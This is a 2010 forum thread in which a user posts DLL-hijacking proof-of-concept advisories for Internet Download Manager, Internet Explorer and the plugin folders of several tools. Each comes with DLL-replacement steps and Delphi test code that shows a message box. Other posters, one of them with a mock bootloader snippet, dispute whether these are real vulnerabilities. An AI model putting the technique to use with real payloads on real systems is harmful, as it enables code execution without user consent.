A forum for reverse engineering, OS internals and malware analysis 

Discussion on reverse-engineering and debugging.
 #2673  by STRELiTZIA
 Tue Sep 07, 2010 4:57 pm
Hi,

IDM Dll Hijacking Exploit:
Exploit Title: [Dll Hijacking Exploit]
Application: [Internet Download Manager module(idmmkb.dll) Tonec Inc.]
Date: [07 Sept 2010]
Author: [STRELiTZIA]
Version: [All Internet Download Manager release]
Tested on: [Windows Xp, Vista, Windows 7]

Description:
------------
Internet Download Manager module(idmmkb.dll) is a monitor for special keys (Alt, Ctrl, etc.) and for mouse clicks on web links in Internet Browsers.
That allows other applications dynamic link libraries to execute malicious code without the users consent,
in the privilege context of the targeted application.

Instructions:
-------------
1- Copy "Test.dll" into %Internet Download Manager folder%
2- Rename "idmmkb.dll" to "idmmkb.dll_Original"
3- Rename "Test.dll" to "idmmkb.dll"

Perform this tests:
-------------------
- Restart your system.
- Try to run Windows Internet Explorer or Mozilla Firefox.
- Try to open you folders and links locate on your Desktop (My Computer, Recycle bin, My Documents and other...)
- Choose any Link property and click Find target.

Test Dll Delphi Source:
---//--
Library Test;
uses
Windows;

begin
MessageBoxA
(
0,
PChar('Yep, I''m running in your system without your permission'),
PChar('Sample'),
MB_ICONSTOP
);
end.
---//---
Plugin Dll Hijacking Exploit:
Exploit Title: [Dll Hijacking Exploit]
Application: [Application plugin support]
Date: [07 Sept 2010]
Author: [STRELiTZIA]
Version: [%Applications list%]
Tested on: [Windows Xp, Vista, Windows 7]

Description:
------------
Allows other applications dynamic link libraries to execute malicious code without the users consent,
in the privilege context of the targeted application.


Applications list: (Tested)
-----------------
PEiD
FastScanner
ExeInfoPE
Stud_PE
PE Explorer
OllyDbg
IDA Pro (*.plw)
notepad++
Hex Workshop
Foxit Reader
PhotoFiltre Studio X
VLC Media player
Import REConstructor
PE Tools by NEOx
DiE- DETECT iT EASY

Instructions:
-------------
1- Copy "Test.dll" into "Application\%plugin%"

Perform this tests:
-------------------
- Launch Application.

Test Dll Delphi Source:
---//---
Library Test;
uses
Windows;

begin
MessageBoxA
(
0,
PChar('Yep, I''m running in your system without your permission'),
PChar('Sample'),
MB_ICONSTOP
);
end.
---//---
Regards.
Attachments
(7.73 KiB) Downloaded 52 times
 #2680  by ssj100
 Wed Sep 08, 2010 4:50 am
Thanks for this. I'll see if it works for me.

EDIT: cool, confirmed working in Windows XP, SP3, with Foxit Reader version 3.2.
 #2681  by GamingMasteR
 Wed Sep 08, 2010 6:09 am
Hi STR,

IDM is widespread and the exploit can be widely used.
But regarding the plugins system hijacking, does the attacker have to search disk for those applications as they are often used in portable forms (not installed in program files like PEiD/OllyDbg/Ida/..) ?!

I think there's no way for application developpers to check if loaded plugins are safe or not, it's the user responsibility :)

Best Regards.
 #2683  by EP_X0FF
 Wed Sep 08, 2010 6:24 am
Well, code signing can help.
 #2700  by STRELiTZIA
 Wed Sep 08, 2010 5:39 pm
Hi,

Another one, I think I'll go a round all installed applications in my system :mrgreen:

Internet Explorer Dll Hijacking Exploit
====================================================
= INTERNET EXPLORER DLL HIJACKING EXPLOIT =
====================================================

Exploit Title : [Internet Explorer Dll Hijacking Exploit]
Date : [08 Sept 2010]
Author : [STRELiTZIA]
Software : [INTERNET EXPLORER]
Tested on : [Windows Xp SP3 + Office 2007]

============================
= Description =
============================
Internet Explorer laod %drive%:\%Program Files%\Microsoft Office\Office12\MSOHEVI.DLL library without checks,
or any visual warning messages related to library modifications.
Vulnerability that can allow attackers to execute malicious code locally, without user consent, in the privilege
context of the targeted application.


============================
= Instructions =
============================
1- Copy "Test.dll" into "%drive%:\%Program Files%\Microsoft Office\Office12\"
2- Rename "MSOHEVI.DLL" to "MSOHEVI.DLL_Original".
3- Rename "Test.dll" to "MSOHEVI.DLL".

============================
= Tests =
============================
- Launch Internet Explorer.


============================
= Test Dll Source "Delphi" =
============================
Library Test;
uses
Windows;

begin
MessageBoxA
(
0,
PChar('Yep, I''m running in your system without your permission.'),
PChar('Sample'),
MB_ICONSTOP
);
end.
Attachments
(8.18 KiB) Downloaded 44 times
 #2715  by Cr4sh
 Thu Sep 09, 2010 6:08 pm
Instructions:
-------------
1- Copy "Test.dll" into %Internet Download Manager folder%
2- Rename "idmmkb.dll" to "idmmkb.dll_Original"
3- Rename "Test.dll" to "idmmkb.dll"
============================
= Instructions =
============================
1- Copy "Test.dll" into "%drive%:\%Program Files%\Microsoft Office\Office12\"
2- Rename "MSOHEVI.DLL" to "MSOHEVI.DLL_Original".
3- Rename "Test.dll" to "MSOHEVI.DLL".
WTF is all this shit? How exactly it related to the real attack vectors?

PS:
;
; !!!0DAY!!! !!!0DAY!!! !!!0DAY!!!
; NTLDR Hijacking Exploit
;
; 1. Compile the following asm code
; 2. Save as C:\ntldr
; 3. Reboot your box
;

mov si, message
.loop:
lodsb
test al, al
jz .end
mov ah, 0x0e
int 0x10
jmp short .loop
.end:
jmp .end
message db "You are hecked!",0
 #2716  by Alex
 Thu Sep 09, 2010 7:34 pm
WTF is all this shit? How exactly it related to the real attack vectors?
Yes, if you have admin privileges you can overwrite all DLL's and this can't be classified as vulnerability. Best example of this kind vulnerability is case when software loads DLL's from current directory while opening for example *.jpg file, instead of loading it from System32/ProgramFiles directories. It's almost like in case of LNK vulnerability and memory sticks, but user have to open an file to trigger DLL loading.
 #2717  by EP_X0FF
 Fri Sep 10, 2010 1:34 am
If you do some profiling with FileMon/DW for example you can watch that many applications are trying to load inexistent dll's (for example Dr.Web in past).